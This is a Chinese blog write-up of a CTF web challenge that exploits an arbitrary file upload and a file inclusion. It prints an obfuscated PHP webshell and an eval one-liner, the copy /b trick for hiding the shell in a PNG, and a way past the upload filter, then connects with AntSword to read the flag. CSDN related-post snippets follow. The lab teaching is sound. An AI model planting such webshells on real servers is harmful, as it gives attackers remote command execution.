ctf-web-3 Welcome to ctf(任意文件上传)

已于 2024-05-22 18:01:58 修改
阅读量373 收藏 2
点赞数 8
分类专栏: CTF 文章标签: web安全 网络安全
于 2024-04-21 17:32:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63554401/article/details/138039289
版权

Welcome to ctf

KEY{uP666_1nclud3_499998_is_Fun}

进来后是如下网页:

查看网页源代码,发现一个upload.php的提示,和下面文件的函数,猜测是任意文件上传,不过还是先登进upload.php网页

进入upload网页如下所示:

只能上传jpg gif png类型的文件,且文件大小不能超过100kb,先试试一句话木马。在webshell中构建php的一句话木马:

具体内容为:

<?php class  GPeo43UG{/*F66L45*/function __construct($x){$c=str_rot13('ffreg');/*F66L45*/$a= ("!"^"@").$c;/*F66L45*/$a($x);}}new  GPeo43UG($_REQUEST['cmd']); ?>

选择一样已有图片(小于100kb),在本目录输入cmd进入控制台后输入

copy tp.png/b+yjh.php tpyjh.png

成功构建一句话图片马,接下来上传报错(我第二次尝试这里是成功的,可能前面确实防止了过滤,但是下面代码更加简单)。

猜测上传保存是进行了过滤,可能是过滤了?Php之类的内容,换一个一句话木马构建图片马。

将一句话木马改为<?=eval($_POST["cmd"]);

上传成功,注意到url是file=,而上传文件和给出了文件上传位置,接下来使用中国蚁剑进行登录,使用url为:

http://172.17.0.31/index.php?file=upload/202404210508511823.png

在其中找到flag

Flag为:KEY{uP666_1nclud3_499998_is_Fun}

白鹿依海
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
近期CTF web
qq_61768489的博客
04-08 1279
NKCTF2023 ctfshow愚人赛 杭师大CTF
ctf文件上传
Zheng_Jay的博客
11-15 3946
客户端校验 最简单的文件校验是本地js校验,一般都是要求只能上传jpg,png,gif图片格式: 应对措施:在本地禁用js。 服务端校验 服务端校验比较棘手一点。 MIME类型校验 虽然我们在客户端同过禁用js上传了文件,但服务端还会再对文件类型进行校验,并且校验的是MIME。 我们在开发者工具中,虽然看到文件发送成功: 但如果服务端对我们请求的数据中的MIME类型进行校验,发现并非image类型,仍会丢弃。 所以,我们要修改请求包中的MIME类型(使用burp suit),常见的MIME类型:
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
CTF-Bugku-welcome to bugkuctf
fzykn06的博客
03-23 563
题目:http://123.206.87.240:8006/test1/ 初识这种题,被坑了挺久,有点难受啊。 打开这个网址得到这样一句话,习惯性的查看源码: 然后发现get方式传递了三个参数:txt、file和password,然后要继续解,就要$user存在,读取的 $user文件内容===welcome to the bugkuctf $flie要求为hint.php,这边就要用到一个p...
bugku ctf welcome to bugkuctf
qq_42777804的博客
08-08 729
首先使用burp进行抓包 <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuc...
welcome to bugkuctf
小白的劝退之路
05-22 338
打开后,查看源码 很显然想让我们利用源码去得到flag。这里我们稍微解释下这个源码的意思。 开始有三个变量:user,file,pass,但是我们发现这里的pass也就是password没有什么用,所以我们重点关注前两个变量。看下面的条件 (1)这里isset的意思是查看变量是否存在,即user不能为空。 (2)file_get_contents是把整个文件读入字符串中,这里也就是把user这个变量(user显然要是一个文件)的内容以字符串的方式读出来并且要和“welcome to the bugkuctf
CTF之Bugku welcome to bugkuctf
weixin_41607190的博客
08-06 412
这道题又拖了好几天- -,各位不要学我。。。 日常抓包 抓到后在proxy中,点击右键发送到这里。 点击Go 分析一波,user、file、pass都是GET方式获取 然后读取的user的内容要和“welcome to bugkuctf”相同 include()是动态获取文件名,也就是这个文件名是hint.php 接着我们要让user的值和我们预想的一样,那就要我们手动传值了 这里用到的是php...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用场景: ... 其他说明: ...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
了解如何安全地处理用户上传、文件路径处理和文件权限是防止文件系统漏洞的关键。 4. **函数和过滤**:不安全的函数使用可能导致漏洞,如`eval()`、`exec()`等。学会使用过滤和验证函数,如`htmlspecialchars()`、`...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
Bugkuctf web题---------welcome to bugkuctf
Amire0x的小乐园
05-04 702
今天做到了一道比较有收获的题,所以呢就打算记下来,涉及到了文件包含的知识,复习复习,对于目前滴俺来说,确实有难度! 题目链接 首先打开题目,如图 查看源码 好的!注释成功引起了我们的注意,第一个线索找到了! 好吧,让我们来分析一下源码 开始来了仨变量,user,file,pass。(跟踪变量有肉吃!) 部分陌生的函数理解: isset——判断变量是否声明,即user补位空 file_get_c...
CTfwebshell
m0_62102520的博客
07-06 372
步骤:请确保能互相ping通,将一句话木马放到phpstudy目录下的www目录下,配置好密码,通过蚁剑链接。不含之母数字的webshell。
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 2834
CTF训练,WEB安全,Burpsuite部分
CTF-Web(3)文件上传漏洞
大表哥的博客
10-26 4709
一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境,而。
陇剑杯 流量分析 webshell CTF writeup
m0_63416413的博客
04-13 1655
陇剑杯 流量分析 webshell writeup CTF 流量分析,找到黑客的攻击手段
菜鸡做题·20200418会员登陆页面(CTF
热门推荐
wengbinqiang17的博客
04-18 1万+
题目地址:http://129.204.207.114 用火狐浏览器打开网址 对于登录框 一般思路是 •爆破,一般的题目用户名都是admin •Sql注入 •信息泄露 F12查看网页源代码 得到账号密码 账号:admin 密码:welcome_to_ctf 登录,进入flag.php页面 当我们成功登录时就能将flag.txt的内容写进session了,而且会将对应的$_SESSION['us...
CTF-OS怎么在github上下载镜像文件
最新发布
05-12
CTF-OS是一个基于Linux的操作系统,它的代码托管在GitHub上,你可以通过以下步骤下载镜像文件: 1. 首先,访问CTF-OS的GitHub仓库:https://github.com/ctf-wiki/ctf-os-2 2. 在页面中找到“Releases”选项卡,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白鹿依海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值